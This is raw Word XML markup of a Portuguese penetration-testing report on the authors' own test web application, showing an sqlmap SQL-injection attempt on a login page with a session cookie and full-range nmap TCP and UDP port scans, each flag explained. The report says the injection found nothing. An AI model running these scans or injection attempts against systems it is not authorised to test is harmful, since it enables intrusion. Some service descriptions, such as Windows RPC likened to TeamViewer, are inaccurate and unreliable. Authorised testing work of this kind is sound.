            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B17B93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ab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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ind w:left="1418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“./sqlmap.py” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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ind w:left="1418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“-u” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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ind w:left="1418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“--cookie” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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ind w:left="1418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“--current -db” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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ind w:left="1418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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> “--level 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870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52870" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870" w:rsidP="0040058D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Pr="00F15F82" w:rsidRDefault="00F52870" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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spera-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se que a tela de Login não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seja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vulnerável à injeção de SQL e consequentemente não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seja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possível descobrir o nome do banco de dados uti</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040058D" w:rsidRDefault="005967D5" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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. Embora tendo aumentado o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e</w:t>
      </w:r>
      <w:r w:rsidR="0040058D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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por consequência</w:t>
      </w:r>
      <w:r w:rsidR="0040058D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> disso,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não foi possível descobrir o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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7137" w:rsidRDefault="008C6DC7" w:rsidP="00D57137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7137">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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F15F82" w:rsidRDefault="00D57137" w:rsidP="00D57137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4.3.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00503644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Atividade</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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="00503644" w:rsidRPr="00F15F82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nálise do Servidor via Nmap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Tarefa realizada dia 24/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação</w:t>
      </w:r>
      <w:r w:rsidR="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, relatado na</w:t>
      </w:r>
      <w:r w:rsidR="004850DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> seção ATA 05 d</w:t>
      </w:r>
      <w:r w:rsidR="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o subcapítulo 4.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dados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Com essa migração alguns serviços adicionais precisaram ser abertos, isso possibilitou que algum serviço adicional não tenha sido fechado no término do processo. A atividade foi refeita para descobrir se algum serviço adicional foi deixado aberto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49317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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B15531">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan TCP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9B1DC9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Comando utilizado: nmap -sV -p 1-65535 IP_do_servidor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52360" w:rsidRDefault="00C52360" w:rsidP="009B1DC9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41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nmap” é utilizado para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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418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“-sV” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311F69" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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418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“-p” indica quais </w:t>
      </w:r>
      <w:r w:rsidR="00311F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidR="00C52360">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s serão usadas na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1418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é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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418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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IP_do_servidor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informa o IP onde está hospedada a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1DC9" w:rsidRDefault="009B1DC9" w:rsidP="00B15531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15531" w:rsidRDefault="00B15531" w:rsidP="00B15531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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B15531" w:rsidRPr="00B15531" w:rsidRDefault="00B15531" w:rsidP="00B15531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pera</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-se</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> descobrir as portas abertas</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, os serviços</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e a versão </w:t>
      </w:r>
      <w:r w:rsidR="00A13973">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dos serviços</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C0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que essas portas roda</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52360" w:rsidRPr="00311F69" w:rsidRDefault="00C52360" w:rsidP="00311F6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52360" w:rsidRDefault="00C52360" w:rsidP="00C52360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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B15531" w:rsidRPr="00676E62" w:rsidRDefault="00C52360" w:rsidP="00676E62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76E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">De acordo com a figura </w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="00676E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00676E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, foi possível descobrir as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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C5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2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766745B0" wp14:editId="72E959C2">
            <wp:extent cx="5400040" cy="4114165"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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5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777DDF" w:rsidP="00311F69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Figura 13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- Portas TCP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470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F470B" w:rsidRPr="00F15F82" w:rsidRDefault="006C21E3" w:rsidP="006C21E3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rviços e</w:t>
      </w:r>
      <w:r w:rsidR="005F470B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na figura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="005F470B" w:rsidRPr="00F15F82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5F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470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F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds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- Ferramenta que auxilia a implantação de imagens em uma distribuição Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd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– Servidor Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft Windows 98 netbios-ssn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– Api que fornece serviços relacionados com a camada de T</w:t>
      </w:r>
      <w:r w:rsidR="00311F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a comunicação de aplicativos locais.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt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– Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="00311F6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2835" w:hanging="351"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r w:rsidR="00311F6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11F69" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–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serviço de gerenciamento de hosts </w:t>
      </w:r>
      <w:r w:rsidR="00311F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do windows.</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F8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49317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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="002D16A4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan de portas UDP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218DE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Comando utilizado: nmap -sU -p 1-65535 IP_do_servidor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D16A4" w:rsidRDefault="00A13973" w:rsidP="00A218D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42" w:firstLine="141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“nmap” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">é utilizado </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00A218D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42"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“-sU” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00A218D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5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“-p” indicará quais </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as 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portas </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">serão </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usa</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>das na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00A218D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42"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IP_do_servidor informa o IP onde está hospedada a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16A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D16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00B15531" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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pera</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir as portas abertas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP</w:t>
